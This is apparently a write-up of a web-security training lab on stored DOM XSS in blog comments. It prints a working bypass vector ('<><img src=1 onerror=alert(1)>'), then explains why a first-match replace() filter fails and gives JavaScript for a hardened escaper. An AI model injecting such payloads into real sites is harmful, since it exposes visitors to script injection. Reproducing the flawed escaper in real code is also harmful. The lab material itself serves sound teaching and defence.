Stored DOM XSS


The website in this lab contains a stored DOM XSS vulnerability in the blog comment functionality. In an attempt to prevent XSS, the website uses the JavaScript replace() function to encode angle brackets.

Reproduction and proof of concept

  1. Use a comment with the vector:

<><img src=1 onerror=alert(1)>
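
Why the filter fails and how to fix it, as an added example that is not the lab's own code: `String.prototype.replace()` called with a string pattern encodes only the first match, so the leading `<>` in the vector absorbs the encoding and the `<img>` tag is stored intact. The function names `escapeFirstOnly`, `escapeAll` and `hasRawAngleBracket` are hypothetical, and the shape of the site's filter is an assumption based on the description above.

```javascript
// Assumed shape of the lab's filter: replace() with STRING patterns.
// A string pattern replaces only the first occurrence it finds.
function escapeFirstOnly(html) {
  return html.replace('<', '&lt;').replace('>', '&gt;');
}

// Hardened form: a global regex encodes every HTML-significant character.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

function escapeAll(html) {
  return String(html).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Regression check for an escaper: does any raw angle bracket survive?
function hasRawAngleBracket(s) {
  return /[<>]/.test(s);
}

// The comment vector from this page.
const pageVector = '<><img src=1 onerror=alert(1)>';

for (const [name, escaper] of [
  ['escapeFirstOnly', escapeFirstOnly],
  ['escapeAll', escapeAll],
]) {
  const out = escaper(pageVector);
  console.log(`${name}: ${out}  (raw bracket survives: ${hasRawAngleBracket(out)})`);
}

// Where the sink allows it, avoid building HTML from comments at all:
// assigning to element.textContent never parses the value as markup.
```
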